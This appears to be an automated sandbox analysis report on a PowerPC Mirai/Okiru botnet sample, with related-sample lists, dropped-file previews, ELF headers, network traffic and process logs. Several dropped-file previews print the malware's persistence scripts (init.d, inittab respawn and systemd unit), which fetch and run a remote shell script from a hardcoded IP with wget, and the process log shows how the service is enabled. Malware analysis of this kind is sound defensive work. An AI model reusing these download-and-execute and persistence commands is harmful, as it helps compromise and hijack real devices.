                                                                        Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                          boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                              boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CANONICAL-ASGBarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                  • 91.189.91.42
                                                                                  snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                                  • 91.189.91.42
                                                                                  snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                  • 91.189.91.42
                                                                                  Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                                  • 91.189.91.42
                                                                                  boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  AMAZON-02USarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 54.171.230.55
                                                                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 18.146.233.71
                                                                                  sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                  • 108.142.201.1
                                                                                  sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                  • 44.232.80.80
                                                                                  botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 13.215.78.161
                                                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 18.203.94.170
                                                                                  snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                  • 54.171.230.55
                                                                                  snype.arm4.elfGet hashmaliciousGafgytBrowse
                                                                                  • 54.247.62.1
                                                                                  boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 54.171.230.55
                                                                                  boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 54.171.230.55
                                                                                  SKHT-ASShenzhenKatherineHengTechnologyInformationCoarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 154.216.19.139
                                                                                  m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 154.216.19.139
                                                                                  hmips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.254.70.159
                                                                                  mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.241.11.68
                                                                                  arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.241.11.57
                                                                                  mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.241.11.45
                                                                                  ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.241.11.95
                                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.241.11.80
                                                                                  arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.241.11.55
                                                                                  file.exeGet hashmaliciousAmadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                  • 154.216.20.237
                                                                                  INIT7CHarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                  • 109.202.202.202
                                                                                  snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                                  • 109.202.202.202
                                                                                  snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                  • 109.202.202.202
                                                                                  Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                                  • 109.202.202.202
                                                                                  boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  /etc/init.d/systempowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    Process:/tmp/powerpc.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):123
                                                                                    Entropy (8bit):4.672165863132152
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:KPJRXgzpJDFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRgrZfoYZX48bbaaeXCO
                                                                                    MD5:24CF061CD47CFE8C75DB6676518F74D5
                                                                                    SHA1:B7B31F856898E3C4FD230FB98B4502AD48E5BCF2
                                                                                    SHA-256:01868376EC7594B93C681375FF68B282754FE0FF0DAE3F28FCE4AFD5C2585230
                                                                                    SHA-512:1EC140880884617159116C9D935161713F866C396ABAA55DDE585049BB0B0BCF2D87B10EA5858966AB5FC2E801A09BE1954B007B5E61CF016A49559E3740635C
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:run bootcmd_mmc0; /tmp/powerpc.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                    Process:/tmp/powerpc.nn.elf
                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                    Category:dropped
                                                                                    Size (bytes):110
                                                                                    Entropy (8bit):4.67849595818307
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:TKH4vZKgzpJDFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8grZzSXoZX48bzBeLXE0
                                                                                    MD5:A10B77AC5627BFC12F77526AFD08AFC6
                                                                                    SHA1:D63F643B9C52313B30D72EDC40956E0EB1E423F3
                                                                                    SHA-256:009E4AD29CB810013486E42A82EAB92ED581D785183B928BF5B3D78E14FAC3ED
                                                                                    SHA-512:5850697B80EA513178BF61F9AE4CCB4EAC65180F32DAF3093B62BE1A63ED322F902C09B8CA0207925917765DA4D0FEAFCBB55D076E0B3C6EDD7E3C3A9380DB6A
                                                                                    Malicious:true
                                                                                    Joe Sandbox View:
                                                                                    • Filename: powerpc.nn.elf, Detection: malicious, Browse
                                                                                    Reputation:low
                                                                                    Preview:#!/bin/sh./tmp/powerpc.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                                    Process:/tmp/powerpc.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):115
                                                                                    Entropy (8bit):4.601891586136072
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:nAWu52zpJDFDDoCvLdjX48FIbILbaaFOdFXa5O:AorZfoYZX48bbaaeXCO
                                                                                    MD5:8BC2DAFF4FBE1AA05CC244B3EE644998
                                                                                    SHA1:22DBCB7079F1AB37946571C8117CC7EE6A16486A
                                                                                    SHA-256:FE7C40501878157401069E2370ADDE3CFC730F7A1A45B83E6B9CAAD5DC083135
                                                                                    SHA-512:631A6A747F2E3998B5E01113EDD8AD29210FAEC40A2A58EC95B4330A0934C361B2CFFC06E6A4D71CC298792C6F85BFFB76AE9EC6979A06751A6EC1BDCED50125
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:::respawn:/tmp/powerpc.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                    Process:/tmp/powerpc.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):106
                                                                                    Entropy (8bit):4.5235307573239725
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:TggzpJDFDvSDRFiLdjX48FIbILbaaFOdFXa50:TggrZzSXoZX48bbaaeXC0
                                                                                    MD5:73CEEC0AFBC3F9015D380B7958409AAA
                                                                                    SHA1:1B9CDF1D381F84E717047B897ACE7321A234B3CD
                                                                                    SHA-256:AEA4108DEA38EAF1D5814897F628394F7DBEC8779BC9DD6FDBB6AD04DF49C520
                                                                                    SHA-512:BC72390BE9C983E99E96E8A36C74F994993092E661DF330DE32D4937AE9BCB5142A8CCAD8AD12E2D7ECA46010E0AA1D90174C06AF170EB5020B1F3C8D64F0395
                                                                                    Malicious:true
                                                                                    Reputation:low
                                                                                    Preview:/tmp/powerpc.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                                    Process:/tmp/powerpc.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):304
                                                                                    Entropy (8bit):5.057055886376161
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:z8ifitRZAMzdK+Urz02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+U/p+GWRdtd+GWRXY+GWRuO
                                                                                    MD5:A8C155BE67AEB37E3052E5D08F79445D
                                                                                    SHA1:8B3D20D941D9BC22C72CF40D85787532C4E85A8F
                                                                                    SHA-256:511A863FCA2BB515DF7617F59F8C9BF53643BC2B3D6EF673995B89747936B69D
                                                                                    SHA-512:178DE28DC835FB5ECF0B1EFEC33757480A934831A19D61891F4009DA170116E93704BAE05C994914E78875AC8A3ACB67F793D0869FFB54F2F9AAADE492A7A9AC
                                                                                    Malicious:false
                                                                                    Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/powerpc.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                                    Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):76
                                                                                    Entropy (8bit):3.7627880354948586
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                    MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                    SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                    SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                    SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                    Malicious:false
                                                                                    Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                    Process:/usr/libexec/gsd-housekeeping
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                    SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                    SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                    SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                    Malicious:false
                                                                                    Preview:.
                                                                                    Process:/tmp/powerpc.nn.elf
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):20
                                                                                    Entropy (8bit):3.684183719779189
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:TggzpJDln:Tggr5n
                                                                                    MD5:3613970D3EE99A4E79418B3D50DD068E
                                                                                    SHA1:0924DD5DC5D93B8E039D25A958AB8F9B13716AF7
                                                                                    SHA-256:B161506DF184EF3F0AAB6A26EB9F22F81B6225876EC250AF1F8794A731C82F01
                                                                                    SHA-512:B3C0A28198FB6C862279CA2C39A3CCF910237A39861F9C62BD8818A855755E0F7A9C19B4306F77B0D9AD73C988570BE74A6AC22BDDA958D4A0C85D333EF4F9C1
                                                                                    Malicious:false
                                                                                    Preview:/tmp/powerpc.nn.elf.
                                                                                    File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                                                                    Entropy (8bit):6.358248281336216
                                                                                    TrID:
                                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                    File name:powerpc.nn.elf
                                                                                    File size:108'548 bytes
                                                                                    MD5:74c49e9055c88f47c12159623058575f
                                                                                    SHA1:b77f4dbedb2dd0bc0c8c34b36122f5b70980f845
                                                                                    SHA256:cd19b2a09dd7c27b5f8d4f547570c083f7107e680fed87428fb22c16728a45fe
                                                                                    SHA512:05896153eafca3f37082f635b0e33d1968b9db18e46a697b61dce79c5bfa105480a7f575925778d7643411f3a2a4f4dc5d34212e168509572f08731ee071ea97
                                                                                    SSDEEP:3072:kuoJ7TEtP90DYTgFy7v06BvoZhaAVJnngku:QNEx90MT7v06BOhaQu
                                                                                    TLSH:70B36D0373184A47D1E719F02A3F17F193EAA99121F0B385650EEB8996B2F365586FCC
                                                                                    File Content Preview:.ELF...........................4...$.....4. ...(..........................................................((........dt.Q.............................!..|......$H...H.h....$8!. |...N.. .!..|.......?..........\..../...@..\?........+../...A..$8...})......N..

                                                                                    ELF header

                                                                                    Class:ELF32
                                                                                    Data:2's complement, big endian
                                                                                    Version:1 (current)
                                                                                    Machine:PowerPC
                                                                                    Version Number:0x1
                                                                                    Type:EXEC (Executable file)
                                                                                    OS/ABI:UNIX - System V
                                                                                    ABI Version:0
                                                                                    Entry Point Address:0x100001f0
                                                                                    Flags:0x0
                                                                                    ELF Header Size:52
                                                                                    Program Header Offset:52
                                                                                    Program Header Size:32
                                                                                    Number of Program Headers:3
                                                                                    Section Header Offset:108068
                                                                                    Section Header Size:40
                                                                                    Number of Section Headers:12
                                                                                    Header String Table Index:11
                                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                    NULL0x00x00x00x00x0000
                                                                                    .initPROGBITS0x100000940x940x240x00x6AX004
                                                                                    .textPROGBITS0x100000b80xb80x1693c0x00x6AX004
                                                                                    .finiPROGBITS0x100169f40x169f40x200x00x6AX004
                                                                                    .rodataPROGBITS0x10016a180x16a180x30000x00x2A008
                                                                                    .ctorsPROGBITS0x1002a0000x1a0000x80x00x3WA004
                                                                                    .dtorsPROGBITS0x1002a0080x1a0080x80x00x3WA004
                                                                                    .dataPROGBITS0x1002a0180x1a0180x5840x00x3WA008
                                                                                    .sdataPROGBITS0x1002a59c0x1a59c0x3c0x00x3WA004
                                                                                    .sbssNOBITS0x1002a5d80x1a5d80x840x00x3WA004
                                                                                    .bssNOBITS0x1002a65c0x1a5d80x21cc0x00x3WA004
                                                                                    .shstrtabSTRTAB0x00x1a5d80x4b0x00x0001
                                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                    LOAD0x00x100000000x100000000x19a180x19a186.43370x5R E0x10000.init .text .fini .rodata
                                                                                    LOAD0x1a0000x1002a0000x1002a0000x5d80x28285.01390x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 1, 2024 15:13:50.608692884 CET4433360654.171.230.55192.168.2.23
                                                                                    Dec 1, 2024 15:13:50.608942032 CET33606443192.168.2.2354.171.230.55
                                                                                    Dec 1, 2024 15:13:50.731909990 CET4433360654.171.230.55192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.303719044 CET38978199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.426110983 CET19938978154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.426198959 CET38978199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.428606033 CET38978199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.430201054 CET38978199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.432594061 CET38980199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.551831961 CET19938978154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.555937052 CET19938980154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.556015015 CET38980199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.557059050 CET38980199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.557667017 CET38980199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.560247898 CET38982199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.597220898 CET19938978154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.677001953 CET19938980154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.681091070 CET19938982154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.681143045 CET38982199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.682678938 CET38982199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.683643103 CET38982199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.698065042 CET38984199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.721287966 CET19938980154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.804428101 CET19938982154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.818527937 CET19938984154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.818593979 CET38984199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.825057030 CET38984199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.827759981 CET38984199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.830635071 CET38986199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.845166922 CET19938982154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.945029974 CET19938984154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.950603962 CET19938986154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.950654984 CET38986199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.955976963 CET38986199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.959021091 CET38986199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:51.989170074 CET19938984154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:51.994987965 CET38988199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:52.075920105 CET19938986154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:52.114886045 CET19938988154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:52.114933968 CET38988199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:52.121156931 CET19938986154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:52.123697996 CET38988199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:52.129014015 CET38988199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:52.185962915 CET38990199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:52.244729042 CET19938988154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:52.297225952 CET19938988154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:52.308132887 CET19938990154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:52.308980942 CET38990199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:52.457667112 CET38990199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:52.577780962 CET19938990154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:52.577866077 CET38990199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:52.825154066 CET43928443192.168.2.2391.189.91.42
                                                                                    Dec 1, 2024 15:13:53.686146021 CET19938978154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:53.686208963 CET38978199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:53.832837105 CET19938980154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:53.832916021 CET38980199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:53.981633902 CET19938982154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:53.981697083 CET38982199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:54.082720041 CET19938984154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:54.082781076 CET38984199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:54.177778959 CET19938986154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:54.177844048 CET38986199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:54.420139074 CET19938988154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:13:54.420321941 CET38988199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:13:58.200267076 CET42836443192.168.2.2391.189.91.43
                                                                                    Dec 1, 2024 15:13:59.736062050 CET4251680192.168.2.23109.202.202.202
                                                                                    Dec 1, 2024 15:14:14.070230007 CET43928443192.168.2.2391.189.91.42
                                                                                    Dec 1, 2024 15:14:24.308774948 CET42836443192.168.2.2391.189.91.43
                                                                                    Dec 1, 2024 15:14:30.451854944 CET4251680192.168.2.23109.202.202.202
                                                                                    Dec 1, 2024 15:14:55.024584055 CET43928443192.168.2.2391.189.91.42
                                                                                    Dec 1, 2024 15:15:15.501691103 CET42836443192.168.2.2391.189.91.43

                                                                                    System Behavior

                                                                                    Start time (UTC):14:13:49
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/dash
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:49
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/rm
                                                                                    Arguments:rm -f /tmp/tmp.3SQz1FitMD /tmp/tmp.XkEh84dmkk /tmp/tmp.fnBcs5PJpu
                                                                                    File size:72056 bytes
                                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/dash
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/rm
                                                                                    Arguments:rm -f /tmp/tmp.3SQz1FitMD /tmp/tmp.XkEh84dmkk /tmp/tmp.fnBcs5PJpu
                                                                                    File size:72056 bytes
                                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/powerpc.nn.elf
                                                                                    Arguments:/tmp/powerpc.nn.elf
                                                                                    File size:5388968 bytes
                                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/powerpc.nn.elf
                                                                                    Arguments:-
                                                                                    File size:5388968 bytes
                                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/powerpc.nn.elf
                                                                                    Arguments:-
                                                                                    File size:5388968 bytes
                                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/systemctl
                                                                                    Arguments:systemctl enable custom.service
                                                                                    File size:996584 bytes
                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                    Start time (UTC):14:13:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/powerpc.nn.elf
                                                                                    Arguments:-
                                                                                    File size:5388968 bytes
                                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                                    Start time (UTC):14:13:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/chmod
                                                                                    Arguments:chmod +x /etc/init.d/system
                                                                                    File size:63864 bytes
                                                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                    Start time (UTC):14:13:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/powerpc.nn.elf
                                                                                    Arguments:-
                                                                                    File size:5388968 bytes
                                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                                    Start time (UTC):14:13:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/ln
                                                                                    Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                                    File size:76160 bytes
                                                                                    MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/libexec/gnome-session-binary
                                                                                    Arguments:-
                                                                                    File size:334664 bytes
                                                                                    MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/libexec/gsd-housekeeping
                                                                                    Arguments:/usr/libexec/gsd-housekeeping
                                                                                    File size:51840 bytes
                                                                                    MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                                                                    Start time (UTC):14:13:50
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/lib/systemd/systemd
                                                                                    Arguments:-
                                                                                    File size:1620224 bytes
